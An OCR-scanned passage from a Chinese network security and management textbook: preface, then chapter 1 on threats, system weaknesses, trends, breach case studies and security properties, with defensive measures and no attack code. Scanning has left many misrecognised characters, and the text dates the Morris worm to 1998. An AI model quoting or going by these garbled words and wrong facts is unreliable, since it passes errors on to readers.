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为 何 编写 本 书 

随 着 网 络 迅速 发 展 ， 网 络 的 开放 性 、 互 联 性 、 共 享 程度 不 断 提高 ， 来 自 外 部 的 黑客 攻 
击 和 内 部 的 威胁 使 网 络 安全 和 管理 问题 日 益 突出 ， 网 络 安全 正面 临 着 重大 挑战 。 另 一 方 
面 ， 网 络 的 日 益 壮 大 给 网 络 管理 提出 了 更 高 的 要 求 ， 完 全 依靠 人员 的 管理 已 经 行 不 通 了 。 

目前 ， 网 络 安全 和 网 络 管理 已 自 成 体系 。 不 仅 有 威胁 网 络 安全 的 各 种 计算 机 病毒 、 木 
马 、 亚 意 软件 ， 以 及 黑客 变化 多 端的 网 络 攻击 行为 ， 还 有 针对 这 些 威胁 的 各 种 网 络 安全 技 
术 、 设 备 和 软件 等 。 网 络 安全 和 管理 已 经 带动 了 多 个 新 兴 产业 的 兴起 和 壮大 。 

网 络 安全 和 管理 涉及 面 非常 广 ， 不 但 包括 计算 机 科学 、 网 络 技术 、 通 信 技 术 、 密 码 技 
术 ， 还 包括 数学 、 数 论 和 信息 论 等 内 容 。 给 学 习 者 带 来 了 很 大 的 困难 ， 本 书 立 足 于 大 学 本 
科 专 业 教 材 ， 同 时 也 为 网 络 管理 人 员 提供 参考 。 


本 书 内 容 特色 
1. 内 容 丰富 、 知 识 全 面 实用 


本 书 首先 介绍 网 络 安全 的 基础 知识 ， 以 及 加 密 和 加 密 技术 ， 然 后 介绍 操作 系统 、Web 
站 点 、 邮 件 系统 防火墙、 病毒 防护 、 网 络 入 侵 等 方面 的 安全 知识 和 技术 ， 最 后 介绍 网 络 
管理 涉及 的 技术 和 方法 ， 以 及 流行 的 网 络 管理 软件 。 

本 书 内 容 由 浅 入 深 ， 从 基础 知识 讲 起 ， 每 个 部 分 的 内 容 也 是 先 理论 后 应 用 ， 理 论 联系 
实际 。 另 外 ， 本 书 在 编写 时 联系 当前 技术 的 发 展 ， 加 入 了 大 量 新 的 技术 和 新 的 应 用 内 容 ， 
婚 充 分 体现 了 时 代 特 色 ， 又 实 实在 在 地 让 读者 领略 到 新 技术 所 带 来 的 实惠 。 

由 于 本 书 内 容 覆 盖 范 围 广泛 ， 不 可 能 介绍 最 基础 的 理论 知识 ， 因 此 对 读者 有 一 定 的 专 
业 知识 要 求 ， 读 者 应 该 具备 基本 的 网 络 理论 知识 ， 学 习 过 计算 机 网 络 课程 。 

2. 结构 严谨 、 系 统 


本 书 除 第 1、2 章 的 基础 理论 介绍 外 ， 各 个 章节 基本 上 相互 独立 ， 内 容 无 交叉 ， 结 构 
严谨 ， 可 单独 构成 系统 ， 方 便 学 习 和 查阅 。 这 些 相互 独立 的 章节 组 合 在 一 起 ， 涵 盖 了 网 络 
安全 的 方方面面 。 


3. 重点 突出 ， 方 便 教 学 


书 中 内 容重 点 突出 ， 在 各 部 分 的 介绍 中 ， 突 出 强调 网 络 安全 的 防护 机 制 、 措 施 或 安全 
配置 。 这 样 就 可 以 使 读者 全 面 系 统 地 进行 学 习 。 


4. 更 多 专业 、 实 用 的 经 验 和 技巧 
作者 通过 多 年 从 事 网 络 管理 和 教学 的 经 验 ， 积 累 的 许多 专业 、 实 用 的 经 验 技巧 ， 以 及 


亚 网 络 安全 与 管理 


对 学 生 和 管理 人 员 真正 需求 的 充分 了 解 ， 在 本 书 中 得 到 了 全 面体 现 。 
总 之 ， 通 过 阅读 本 书 ， 可 以 使 读者 全 面 了 解 和 掌握 网 络 安全 和 管理 的 相关 知识 和 技 
术 ， 以 便 更 好 地 进行 学 习 和 网 络 管理 工作 。 


适用 读者 群 


@ ”计算 机 或 信息 相关 专业 本 科 生 、 其 他 专业 研究 生 。 
e@ ”从 事 网 络 管理 的 技术 人 员 。 


参加 本 书 编写 、 校 验 工作 的 人 员 还 有 : 章 吴 、 范 志 杰 、 王 新 春 、 李 晓 颖 、 杨 红 霞 、 王 
慧 然 、 获 剑 锋 、 张 春平 ， 在 此 一 并 表示 由 衷 的 感谢 。 由 于 笔者 水 平 有 限 ， 加 之 时 间 仓 促 ， 
尽管 花 了 大 量 时间 和 精力 校 验 ， 但 书 中 可 能 还 会 存在 一 些 疏 漏 ， 敬 请 各 位 读者 批评 指正 ， 
万 分 感谢 ! 
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计算 机 网 络 的 出 现 给 人 们 提供 了 一 个 全 新 的 世界 ， 它 不 断 地 发 
展 壮大 改变 了 人 们 工作 和 生活 的 方式 : 可 以 和 远 在 天 涯 的 亲人 视频 
联络 ， 可 以 足 不 出 户 地 浏览 自己 所 需 的 信息 。 但 网 络 给 人 们 带 来 方 
便 的 同时 ， 也 带 来 了 安全 隐患 : 私人 信息 被 公开 、 商 业 机 密 被 窃 
取 ， 安 全 事件 频繁 出 现 。 

网 络 安 全 是 一 个 系统 ， 不 是 一 种 技术 或 者 一 个 产品 所 色 


的 ， 它 涉及 网 络 的 组 成 和 通信 和 系统、 网络 的 层次 
互联 设备 、 操 作 系 统 和 网 络 服务 等 内 容 ， 相 关内 
要 介绍 。 


及 网 络 安全 与 管理 


1.1 网 络 安全 现状 及 趋势 
网 络 安 全 正在 得 到 人 们 越 来 越 多 的 关注 ， 本 节 主 要 讲述 网 络 安全 的 现状 和 发 展 趋势 。 


1.1.1 网 络 安全 的 主要 威胁 


随 着 信息 化 水 平 的 不 断 提高 ， 人 们 的 生活 、 工 作 越 来 越 依赖 于 网 络 ， 网 络 已 经 变 成 一 
个 无 处 不 在 的 基本 工具 ， 国 家 的 经 济 、 文 化 、 军 事 和 社会 生活 与 网 络 也 息息相关 。 然 而 在 
带 来 便利 的 同时 ， 网 络 也 带 来 了 巨大 的 安全 风险 ， 加 上 信息 安全 规范 标准 不 统一 ， 且 跟 不 
上 技术 发 展 的 现状 ， 使 得 安全 威胁 越 来 越 猩 猴 。 

【案例 1-1】2006 年 8 月 17 日 17 岁 黑客 发 威 ， 腾 讯 QQ 网 站 被 黑 

事件 回放 : 

2006 年 7 月 31 日 开始 ， 湖 北 某 市 17 岁 黑客 地 某 利 用 腾讯 公司 的 系统 漏洞 ， 非 法 侵 
入 该 公司 的 80 余 台 计算 机 系统 ， 并 通过 这 些 电脑 分 析 数 据 后 逐步 取得 该 公司 的 域 密码 及 
其 他 重要 资料 ， 进 而 取得 多 个 系统 数据 库 的 超级 用 户 权 限 ， 在 13 台 服 务 器 中 植 入 木马 程 
序 。 在 获得 大 量 网 络 庶 拟 财产 后 ， 圭 某 通过 打 电 话 和 发 短信 的 方式 ， 称 已 获取 该 公司 的 网 
络 管理 漏洞 ， 向 腾讯 公司 及 其 总 裁 进 行 敲诈 勒索 。 事 后 ， 警 方 以 涉嫌 破坏 计算 机 信息 系统 
罪 ， 将 该 黑客 刑拘 。 

原因 解密 : 

此 黑客 在 腾讯 官方 论坛 发 布 一 帖子 ， 声 称 发 现 该 公司 系统 漏洞 ， 并 制作 一 木马 压缩 后 
上 传 至 论坛 ， 后 被 腾讯 论坛 管理 人 员 下 载 后 并 在 本 地 执行 ， 随 之 木马 被 运行 ， 黑 客 得 到 服 
务 器 的 控制 权 。 

其 实 道理 很 简单 ， 如 今 黑 客 工具 泛滥 成 灾 ， 入 侵 随 时 都 可 能 发 生 ， 浏 览 的 网 页 可 能 被 
挂 马 ， 下 载 的 文件 可 能 含有 恶意 代码 。 本 次 入 侵 ， 究 其 原因 在 于 腾讯 工作 人 员 安 全 防范 意 
识 不 够 ， 在 面 对 狐 猎 的 犯罪 分 子 时 缺乏 应 有 的 警惕 性 ， 同 时 对 于 安全 防范 技能 也 急需 
提高 。 

【案例 1-2】 美 伊 战争 引发 美国 历史 上 最 大 的 黑客 恐怖 获 击 

事件 回放 : 

2003 年 3 月 20 日 ， 美 伊 战争 爆发 。 在 炸弹 持续 向 伊拉克 倾泻 之 际 ， 黑 客 有 组 织 地 得 
改 美国 和 英国 的 网 站 事件 每 1 分 钟 就 会 有 3~4 起 发 生 ， 这 次 黑客 攻击 在 数量 和 速度 上 都 
大 大 超过 以 往 。 

原因 解密 : 

此 次 黑客 大 战 ， 使 用 了 两 种 攻击 手段 。 

Microsoft IIS 5.0 默认 提供 对 WebDAYV 的 支持 ，WebDAYV 可 以 通过 HTTP 向 用 户 提供 
远程 文件 存储 的 服务 。IIS 5.0 包含 了 WebDAV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数 
据 ， 远 程 攻击 者 利用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ， 就 能 够 以 Web 进程 权限 
在 系统 上 执行 任意 指令 。 

DoS 拒绝 服务 攻击 也 是 本 次 黑客 大 战 常见 的 攻击 方法 ， 由 于 TCP/IP 协议 本 身 的 缺 
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陷 ，DoS 攻击 不 可 防御 。 
据 统 计 ， 全 球 约 每 20 秒 钟 就 会 发 生 一 次 网 络 入 侵 事件 ， 约 1/4 的 防火 墙 被 攻破 过 ， 
并 且 随 着 技术 的 不 断 进步 ， 网 络 安全 面临 的 威胁 呈现 多 种 多 样 的 形式 ， 如 图 1-1 所 示 。 


蠕虫 侦 听 篡改 泄密 后 门 


1-1 网 络 安全 面临 的 各 种 威胁 
计算 机 网 络 安全 面临 的 主要 威胁 可 以 总 结 为 以 下 几 种 情况 。 
1. 人 为 玻 忽 


人 为 朴 忽 主要 是 由 于 安全 意识 薄弱 或 者 管理 者 责任 心 不 强 造成 的 ， 是 可 以 尽力 避免 
的 。 操 作 员 由 于 安全 配置 不 当 ， 或 者 没有 及 时 打 补 丁 而 引发 的 攻击 时 有 发 生 ， 另 外 用 户 安 
全 意识 差 、 密 码 选 择 不 慎 ， 或 者 把 自己 的 密码 随意 在 网 上 发 送 给 别人 ， 也 是 信息 失窃 的 主 
要 原因 之 一 。 


2. 人 为 攻击 


人 为 攻击 包括 主动 攻击 和 被 动 攻 击 两 种 类 型 。 

主动 攻击 是 以 各 种 方式 有 选择 地 破坏 信息 的 有 效 性 和 完整 性 ， 很 容易 被 发 现 。 主 动 攻 
击 包括 拒绝 服务 攻击 、 信 息 算 改 、 资 源 使 用 和 欺骗 等 攻击 方法 。 

被 动 攻 击 的 目的 是 收集 信息 而 不 是 进行 访问 ， 在 不 影响 网 络 正常 工作 的 情况 下 ， 攻 击 
者 通过 嗅 探 、 信 息 收集 等 攻击 方法 ， 截 获 、 窃 取 、 破 译 网 络 数据 来 获得 重要 机 密 信息 。 被 
动 攻击 不 易 被 发 现 ， 对 网 络 安全 危害 极 大 ， 尤 其 是 近年 来 呈现 出 智能 型 、 严 重 性 、 隐 项 性 
和 多 样 性 的 特征 。 

虽然 被 动 攻击 的 检测 十 分 困难 ， 然 而 阻止 这 些 攻击 的 成 功 是 可 行 的 。 对 被 动 攻击 强调 
的 是 阻止 而 不 是 检测 。 


3. 软件 漏洞 
网 络 软件 由 于 种 种 原因 总 是 存在 这 样 那样 的 漏洞 和 缺陷 ， 成 为 黑客 攻击 的 首选 目标 ， 
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软件 的 隐秘 通道 一 旦 被 打开 ， 后 果 不 堪 设想 。 
4. 非 授权 访问 


非 授权 访问 主要 是 指 在 预先 没有 经 过 同意 的 前 提 下 ， 擅 自 使 用 网 络 或 计算 机 资源 ， 如 
故意 避 开 身份 认证 或 访问 控制 ， 对 服务 器 或 数据 库 资源 进行 非 正 常 使 用 等 。 非 授权 访问 主 
要 包括 : 假冒 、 身 份 攻击 、 非 法 用 户 进入 网 络 系统 进行 违法 操作 ， 合 法 用 户 以 未 授权 方式 
进行 操作 等 。 

5. 信息 泄露 或 丢失 


信息 泄露 或 丢失 是 指 敏感 数据 被 有 意 或 无 意 地 泄露 出 去 或 丢失 ， 如 在 信息 传输 中 丢失 
或 泄露 。 最 近 几 年 ， 这 种 势头 愈演愈烈 ， 大 量 用 户 的 个 人 信息 被 叫价 出 卖 ， 行 为 十 分 
恶劣 。 

以 上 网 络 安全 的 各 种 威胁 中 主要 的 攻击 方法 有 : 窃听 、 论 传 、 伪 造 、 自 改 、 截 获 、 拒 
绝 服务 攻击 、 行 为 否认 、 旁 路 控制 、 物 理 破坏 、 病 毒 、 木 马 、 窃 取 、 服 务 欺骗 、 陷 阱 、 消 
息 重 发 和 信息 战 等 。 


1.1.2 网络 系统 的 脆弱 性 


除 前 面 叙 述 的 各 种 网 络 威胁 外 ， 网 络 本 身 也 存在 着 一 些 固有 的 弱点 ， 使 得 非法 用 户 可 
以 利用 这 些 弱点 入 侵 系统 ， 破 坏 数据 。 网 络 系统 的 脆弱 性 主要 表现 在 以 下 几 方 面 。 


1. 操作 系统 的 脆弱 性 


网 络 操作 系统 为 了 升级 和 维护 方便 提供 了 一 些 服务 ， 这 些 服 务 虽 然 为 厂商 和 用 户 提供 
了 便利 ， 但 同时 也 为 黑客 和 病毒 提供 了 后 门 ， 比 如 为 了 方便 打 补 丁 的 动态 链接 、 可 以 远程 
访问 的 RPC， 以 及 系统 为 方便 维护 而 提供 的 空 口令 等 。 

网 络 操作 系统 允许 在 远程 节点 上 创建 和 激活 进程 ， 加 上 超级 用 户 的 存在 ， 给 黑客 提供 
了 入 侵 的 通道 ， 如 黑客 将 木马 附 到 超级 用 户 上 ， 避 开 作业 监视 程序 的 检测 。 


2. 计算 机 系统 的 脆弱 性 


计算 机 系统 本 身 的 软 硬 件 故障 也 可 能 影响 系统 的 正常 运行 。 硬 件 故障 包括 电源 故障 、 
芯片 故障 、 驱 动 器 故障 和 存储 介质 故障 等 ， 存 储 介质 尤其 用 于 服务 器 时 ， 使 用 频繁 ， 很 容 
易 出 现 故 障 ， 另 外 由 于 其 存 有 大 量 信息 ， 也 容易 被 盗窃 或 损坏 ;软件 故障 指 应 用 软件 和 驱 
动 程序 等 存在 漏洞 ， 又 不 能 及 时 维护 ， 从 而 给 黑客 以 可 乘 之 机 。 


3. 数据 库 系 统 的 脆弱 性 


数据 库 管理 系统 (DBMS) 采 用 分 级 管理 机 制 ， 且 必须 与 操作 系统 的 安全 配套 ， 攻 击 者 
攻破 操作 系统 后 ， 很 容易 侵入 数据 库 。 数 据 库 是 信息 的 主要 载体 ， 一 旦 被 攻破 ， 损 失 巨 
大 ， 而 对 数据 库 中 的 数据 加 密 又 会 影响 数据 库 的 运行 效率 。 另 外 B/S 架构 的 应 用 程序 的 某 
些 缺 陷 也 可 能 威胁 数据 库 的 安全 。 

4. 网 络 通信 的 脆弱 性 


通信 介质 在 应 对 这 种 威胁 时 ， 显 得 非常 脆弱 。 非 法 用 户 可 以 对 有 线 线路 进行 物理 破 
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坏 、 搭 线 窃取 数据 ;对 无 线 传输 侦 听 、 窃 听 等 。 各 种 通信 介质 还 可 能 由 于 屏蔽 不 严 造 成 电 
磁 信息 辐射 ， 进 而 导致 机 密 信息 外 泄 。 

通信 协议 也 存在 安全 漏洞 。 按 照 RFC793 实现 的 TCP 协议 就 存在 安全 漏洞 ， 正 常 的 
TCP 连接 可 以 被 非法 第 三 方 复位 ， 因 此 ， 攻 击 者 可 以 插入 虚假 数据 到 正常 的 TCP 会 话 
中 ; SMTP 存在 封装 SMTP 地 址 的 漏洞 ， 导 致 攻击 者 能 够 绕 过 RELAY 规则 发 送 有 害 信 
息 ; ARP 协议 漏洞 导致 ARP 欺骗 ，FTP 的 允许 匿名 服务 等 ， 都 是 通信 协议 脆弱 性 的 表现 。 


1.1.3 网络 安 全 现状 


从 1998 年 Robert Morris Internet 蠕虫 开始 ， 到 2001 年 蠕虫 病毒 全 面 爆发 ， 给 人 们 造 
成 了 巨大 的 损失 。 病 毒 破坏 计算 机 资源 和 数据 信息 ， 除 了 造成 资源 和 财富 的 损失 ， 还 可 能 
造成 社会 性 的 灾难 。 据 统计 ， 几 乎 每 天 都 有 新 的 病毒 产生 ， 目 前 全 球 存 在 至 少 上 万 种 病 
毒 ， 病 毒 技术 也 朝 着 智能 化 、 网 络 化 和 可 控制 化 方向 发 展 。 一 些 国 家 的 军 方 试图 利用 病毒 
作为 现代 战争 的 攻击 手段 ， 正 在 大 力 开发 攻击 性 计算 机 病毒 。 

黑客 攻击 的 目标 不 但 包括 计算 机 和 网 络 设 备 ， 还 包括 手机 等 无 线 终端 ， 并 开始 向 着 获 
取 利 益 方面 转移 。 

正 因为 网 络 安全 的 威胁 无 处 不 在 ， 才 导致 对 安全 的 相关 研究 越 来 越 多 。 在 安全 协议 理 
论 和 技术 方面 的 研究 经 过 一 段 时 间 的 摸索 和 实践 ， 已 日 趋 成 熟 ， 它 包括 协议 的 安全 性 分 析 
方法 和 各 种 实用 安全 协议 的 设计 。 目 前 ， 大 量 的 实用 安全 协议 已 经 投入 使 用 ， 例 如 ， 简 单 
网 络 管理 协议 (SNMP)、IPSec 协议 、S-HTTP 协议 等 。 安 全 协议 的 总 趋势 是 标准 化 ， 制 定 
统一 的 协议 规范 。 

在 密码 技术 研究 上 ， 主 要 包括 基于 数学 的 密码 技术 和 基于 非 数 学 的 密码 技术 。 对 于 公 
钥 密码 、 认 证 码 和 序列 密码 这 几 项 基于 数学 的 密码 技术 的 研究 已 经 日 趋 成 熟 ， 并 取得 了 一 
些 成 果 。 目 前 国际 上 对 非 数学 密码 技术 的 讨论 非常 活跃 ， 它 包括 信息 隐形 、 量 子 密码 、 基 
于 生物 特征 的 识别 技术 等 。 信 息 隐 形 中 的 数字 水 印 技术 已 经 应 用 在 一 些 网 站 中 ; 用 以 保护 
版 权 ， 基 于 生物 特征 的 指纹 识别 和 语音 识别 也 已 经 被 广泛 使 用 ， 一 些 笔记 本 电脑 增加 了 指 
纹 识别 功能 ， 手 机 增加 了 语音 识别 功能 等 ， 极 大 地 方便 了 用 户 。 

安全 产品 方面 ， 目 前 市 场 上 比较 流行 的 主要 有 : 防火 墙 、 安 全 路 由 器 、 虚 拟 专用 网 
(VPN)、 安 全 服务 器 、 电 子 签 证 机 构 一 一 CA 和 PKI 产品 、 用 户 认证 产品 、 安 全 管理 中 
心 、 入 侵 检 测 系统 (IDS)、 安 全 数据 库 和 安全 操作 系统 等 。 


1.1.4 网 络 安全 的 发 展 趋势 


由 于 网 络 系统 自身 的 脆弱 性 以 及 网 络 威胁 不 断 发 展 升级 ， 因 此 对 网 络 安全 提出 了 更 高 
的 要 求 ， 未 来 网 络 安全 将 呈现 如 下 发 展 趋势 。 


1. 网 络 安全 体系 化 

随 着 信息 化 程度 的 不 断 提高 ， 网 络 安全 变 得 更 为 复杂 ， 不 再 是 某 个 安全 产品 或 某 项 安 
全 技术 所 能 解决 的 。 未 来 的 网 络 安全 将 会 纵向 、 横 向 全 面 发 展 ， 成 为 综合 防御 体系 ， 更 注 
重 应 用 安全 和 安全 管理 。“ 三 分 技术 ， 七 分 管理 ”， 安 全 管理 在 网 络 安全 中 所 占 的 比重 会 
越 来 越 大 ， 国 家 十 分 重视 网 络 和 信息 的 安全 性 问题 ， 将 会 逐步 建立 和 完善 信息 安全 保 
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障 体系 。 
2. 技术 发 展 两 极 分 化 


技术 发 展 的 两 极 分 化 包括 技术 的 专 一 和 技术 的 融合 。 由 于 一 些 大 的 集团 企业 和 对 安全 
要 求 比较 高 的 政府 部 门 网 络 ， 要 应 对 各 种 各 样 的 安全 威胁 ， 对 产品 性 能 要 求 很 高 ， 因 此 为 
了 应 对 这 种 需求 像 防火 墙 、 入 侵 检 测 系 统 和 防毒 杀毒 产品 等 ， 越 做 越 专 。 

目前 市 场 上 出 现 了 融合 两 种 或 几 种 安全 功能 于 一 体 的 产品 ， 用 于 一 些 规模 较 小 的 网 
络 ， 既 保证 了 功能 ， 又 节约 了 成 本 。 另 外 越 来 越 多 的 网 络 设备 都 集成 了 防火 墙 的 部 分 功 
能 ， 用 以 提高 设备 自身 和 所 辖区 域 网 络 的 安全 性 ， 如 现在 大 部 分 三 层 交 换 机 都 具备 防火 墙 
的 过 滤 功能 。 防 毒 防 攻击 的 功能 被 集成 到 越 来 越 多 的 软件 系统 中 ， 大 量 网 络 管理 软件 都 增 
加 了 防范 恶意 程序 的 功能 。 


3. 安全 威胁 利益 化 、 产 业 化 、 职 业 化 


黑客 和 病毒 制作 人 员 不 再 单纯 地 追求 个 人 “荣誉 感 ”， 而 更 关注 商业 财富 利益 ， 甚 至 
有 些 人 已 经 变 成 了 专业 化 程度 很 高 、 有 组 织 的 职业 罪犯 。 电 子 商务 成 为 热点 后 ， 针 对 网 上 
银行 和 支付 平台 的 攻击 越 来 越 多 ， 病 毒 从 开始 的 破坏 系统 、 销 毁 数 据 ， 到 窃取 隐私 和 财 
富 ， 从 早期 的 盗窃 虚拟 价值 转向 直接 的 金融 犯罪 ， 已 经 形成 了 一 个 专业 化 程度 很 高 的 产业 
链 : 专业 的 病毒 木马 编写 人 员 、 专 业 的 盗号 人 员 、 有 组 织 的 销售 渠道 和 专业 的 玩家 。 最 
近 ， 部 分 网 站 被 曝 用 户 信息 被 窃取 的 消息 ， 有 些 网 站 给 用 户 发 邮件 要 求 他 们 修改 密码 ， 以 
保护 个 人 账户 的 安全 。 

另外 ， 越 来 越 多 的 恶意 软件 削弱 了 病毒 特征 ， 增 加 了 钓鱼 欺骗 元 素 ， 目 标 直 指 商业 利 
益 。 网 页 挂 马 成 为 木马 传播 的 又 一 “帮凶 ”， 不 但 大 量 消耗 了 服务 器 的 系统 资源 和 带宽 ， 
也 严重 威胁 着 客户 端 用 户 的 信息 安全 。 


4. 网 络 威胁 由 静态 转 为 动态 


传统 的 网 络 威胁 是 静态 的 ， 目 标 多 指向 服务 ， 现 在 很 多 威胁 是 动态 存在 的 ， 不 破坏 服 
务 的 提供 ， 反 而 把 自己 隐藏 在 网 络 数据 和 应 用 之 中 ， 利 用 服务 来 传播 ， 比 如 在 通信 流 、 文 
件 和 电子 邮件 中 夹杂 恶意 代码 ， 通 过 相应 的 网 络 服务 达到 传播 的 目的 ， 这 种 威胁 更 难 防 
御 。 自 动 邮件 发 送 工具 也 日 趋 成 熟 ， 垃 圾 邮件 和 病毒 邮件 势必 更 加 独 狂 。 


5. 漏洞 攻击 更 为 迅猛 


攻击 者 越 来 越 关注 系统 漏洞 和 软件 漏洞 ， 有 时 在 补丁 发 布 之 前 ， 利 用 漏洞 的 攻击 已 经 
出 炉 ， 尤 其 在 一 些 嵌入 式 系统 中 ， 漏 洞 难以 修复 。 

6. Web 2.0 产品 受到 挑战 

Web 2.0 更 注重 用 户 的 交互 ， 用 户 既 是 网 站 内 容 的 浏览 者 ， 也 是 网 站 内 容 的 制造 者 ， 
参与 网 站 的 建设 ， 像 博客 、RSS、 百 科 全 书 (WiKi)、 网 摘 、 社 会 网 络 (SNS)、P2P、 即 时 消 
息 (IM) 等 。Web 2.0 产品 虽然 提供 了 丰富 的 信息 和 展现 自我 的 机 会 ， 但 另 一 方面 也 更 容易 
被 病毒 利用 ， 它 们 往往 成 为 网 络 钓鱼 首要 的 攻击 目标 。 
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【案例 1-3】2011 年 年 未 上 演 “ 密 码 危机 ” 

事件 回放 : 

2011 年 12 月 21 日 上 午 ， 黑 客 在 网 上 公开 了 开发 者 技术 社区 CSDN 网 站 600 余 万 个 
注册 用 户 的 信息 ， 其 中 包括 注册 邮箱 以 及 明文 密码 。 之 后 天 涯 、 人 人 网 、 开 心 网 等 多 家 网 
站 的 用 户 数 据 也 被 相继 公开 ， 以 压缩 文件 的 形式 公然 提供 下 载 ， 多 达 千 万 的 用 户 信 息 中 不 
乏 名 人 的 资料 ， 是 中 国 互联 网 史上 规模 最 大 的 一 次 用 户 资料 泄露 事件 。 目 前 4 人 被 拘留 ， 
8 人 被 治安 处 罚 。 

原因 解密 : 

此 次 密码 泄露 事件 的 原因 有 两 个 : 很 多 网 站 管理 者 安全 意识 不 足 ， 没 有 对 密码 进行 加 
密 存 储 ， 长 期 使 用 明文 密码 ; 并 且 为 了 吸引 客户 ， 纵 容 用 户 使 用 简单 密码 ， 给 黑客 留 下 可 
乘 之 机 。 

黑客 攻破 一 家 网 站 的 服务 器 后 ， 获 得 大 量 的 用 户 信 息 (包括 常用 邮箱 和 密码 )， 大 多 数 
用 户 习 惯用 同一 个 密码 登录 多 家 网 站 ， 甚 至 用 相同 的 账号 和 邮箱 ， 因 此 很 容易 导致 网 上 支 
付 等 其 他 账号 也 一 并 丢失 ， 黑 客 “ 托 库 ” 后 试探 盗号 ， 导 致 更 多 网 站 信息 被 盗 。 

另外 一 些 软件 厂商 由 于 利益 驱使 ， 大 量 非 法 搜集 潜在 用 户 的 行为 ， 也 起 到 了 推波助澜 
的 作用 。 


1.2 网络 安全 概述 


本 节 主 要 讲述 网 络 安全 的 含义 、 主 要 的 技术 特征 、 研 究 目标 和 内 容 、 防 护 技术 等 。 


1.2.1 网 络 安全 的 含义 及 技术 特征 


1. 网 络 安全 的 含义 


网 络 安全 是 一 个 系统 ， 不 是 杀毒 软件 ， 不 是 防火 墙 ， 不 是 入 侵 检测 ， 也 不 是 认证 和 授 
权 ， 不 是 单纯 地 依靠 技术 、 依 靠 产品 ， 虽 然 技术 和 产品 都 扮演 着 很 重要 的 角色 。 网 络 安全 
非常 复杂 ， 需 要 成 熟 的 安全 架构 、 统 一 的 安全 标准 、 管 理 者 较 强 的 安全 意识 、 严 密 完善 的 
安全 策略 、 不 断 改进 的 安全 管理 、 逐 步 提高 和 升级 的 安全 技术 和 产品 。 所 有 这 些 因素 结合 
在 一 起 才能 提高 网 络 的 安全 性 ， 缺 一 不 可 。 另 外 单纯 就 技术 而 言 ， 网 络 安全 涉及 计算 机 科 
学 、 网 络 技术 、 通 信 技 术 、 应 用 数学 、 密 码 技术 和 信息 论 等 多 个 学 科 。 

比如 对 于 80 端口 的 蠕虫 病毒 来 说 ， 有 很 多 方法 可 以 减轻 其 对 公共 服务 器 和 其 他 主机 
的 危害 : 

(1) 在 主机 上 正确 配置 防火 墙 ， 既 可 以 阻止 病毒 入 侵 ， 也 可 以 防止 病毒 传染 至 其 他 主 
机 或 网 络 。 

(2) 利用 私有 虚拟 局 域 网 (PVLAN) 有 助 于 防止 Web 服务 器 感染 同一 网 络 中 其 他 的 主 
机 系统 。 

(3) 利用 入 侵 检 测 IDS 阻止 和 检测 对 Web 服务 器 的 入 侵 企图 。 

(4) 及 时 升级 杀毒 软件 特征 库 ， 使 之 能 够 检测 到 蠕虫 病毒 或 其 他 恶意 代码 。 

(5) 加 强 网 络 管理 ， 及 时 打 补 丁 、 定 期 扫描 漏洞 、 加 强 操作 系统 防范 、 完 善 Web 服 
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务 安全 策略 等 。 

综合 利用 这 些 因素 ， 可 以 大 大 提高 服务 器 抵御 80 端口 蠕虫 病毒 的 能 力 。 

因此 ， 网 络 安全 (Network Security) 是 指 利用 网 络 管理 控制 和 技术 措施 ， 保 证 在 网 络 环 
境 中 数据 的 保密 性 、 完 整 性 、 网 络 服务 可 用 性 和 可 审查 性 受到 保护 ， 保 证 网 络 系统 硬件 和 
软件 的 连续 运行 ， 保 证 提供 的 服务 免 遭 干扰 和 破坏 ;保证 信息 的 完整 性 和 保密 性 。 

有 时 把 网 络 安全 分 成 两 部 分 : 系统 安全 和 信息 安全 。 保 证 信息 安全 是 网 络 安全 的 最 终 
目的 。 

同 其 他 事物 一 样 ， 网 络 没有 绝对 的 安全 ， 只 要 联网 就 存在 威胁 ， 管 理 者 需要 依据 实际 
情况 ， 在 性 能 和 安全 上 寻求 一 个 平衡 点 。 另 外 ， 网 络 安全 最 重要 的 是 与 时 俱 进 ， 密 切 关注 
网 络 中 的 各 种 威胁 、 系 统 漏洞 和 安全 技术 产品 的 最 新 动向 ， 做 到 新 的 威胁 到 来 时 能 提前 
预防 。 


2. 网 络 安全 的 技术 特征 


网 络 安全 主要 的 技术 特征 是 : 保密 性 、 完 整 性 、 可 用 性 、 可 靠 性 、 可 控 性 和 不 可 否 
认 性 。 

1) ”保密 性 

保密 性 是 指 网 络 信息 未 经 允许 不 泄露 给 其 他 用 户 或 实体 的 过 程 ， 信 息 只 有 授权 用 户 才 
能 够 使 用 ， 并 且 用 户 必须 按照 指定 的 要 求 使 用 ， 不 得 超出 约定 的 使 用 范围 ， 未 经 允许 不 得 
转借 他 人 ， 不 得 用 于 商业 目的 。 

常用 的 保密 技术 有 : 防 侦 收 、 防 辐射 、 信 息 加 密 、 物 理 隔离 。 

2) ”完整 性 

完整 性 是 指 网 络 信息 在 存储 、 传 输 、 交 互 和 处 理 的 过 程 中 保证 信息 的 原样 性 ， 未 经 授 
权 不 得 修改 、 破 坏 和 删除 ， 是 信息 安全 中 最 基本 的 特性 。 

保证 完整 性 的 主要 方法 有 : 协议 、 编 码 方法 、 密 码 校 验 、 数 字 签名 和 认证 。 

3) “可 用 性 

可 用 性 是 指 网 络 和 信息 可 以 被 授权 实体 正确 使 用 ， 并 且 在 非 正常 情况 下 能 够 恢复 访问 
的 特征 。 在 系统 正常 运行 时 ， 实 体能 够 正常 使 用 网 络 ， 能 够 访问 所 需 的 信息 ; 当 网 络 和 系 
统 被 攻击 (比如 拒绝 服务 攻击 ) 和 破坏 时 ， 能 够 迅速 恢复 使 用 。 可 用 性 一 般 用 系统 正常 使 用 
时 间 与 整个 工作 时 间 之 比 来 衡量 。 

可 用 性 应 该 满足 以 下 要 求 : 身份 识别 与 确认 、 访 问 控制 、 业 务 流 控制 、 路 由 选择 控 
制 、 审 计 跟 踪 。 

4) “可 靠 性 

可 靠 性 是 指 网 络 和 信息 的 抗 毁 性 、 生 存 性 和 有 效 性 ， 即 在 人 为 破坏 、 随 机 破坏 的 情况 
下 ， 能 够 保证 网 络 和 信息 可 放心 使 用 和 有 效 的 特性 ， 包 括 硬件 可 靠 性 、 软 件 可 靠 性 、 人 员 
可 靠 性 和 环境 可 靠 性 等 。 

5) “可 控 性 

信息 可 控 性 是 指 对 流通 在 网 络 系统 中 的 信息 传播 及 具体 内 容 能 够 有 效 控制 的 特性 ， 授 
